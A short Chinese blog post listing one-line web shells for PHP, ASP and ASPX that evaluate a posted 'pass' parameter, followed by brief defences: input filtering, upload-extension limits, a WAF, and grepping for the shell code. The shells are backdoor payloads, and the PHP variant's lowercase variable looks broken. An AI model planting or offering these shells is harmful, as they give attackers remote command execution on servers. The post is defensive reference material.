php <?php @eval($_post['pass']);?>
asp <%eval request ("pass")%>
aspx <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
防御
代码中过滤。限制上传文件的后缀名
waf过滤
检查是否存在一句话木马。fgrep -R '一句话木马代码' /var/www/xxx
posted on 2019-08-17 17:00 jiersixi 阅读(164) 评论(0) 编辑 收藏 举报
Powered by: 博客园 Copyright © 2024 jiersixi Powered by .NET 9.0 on Kubernetes
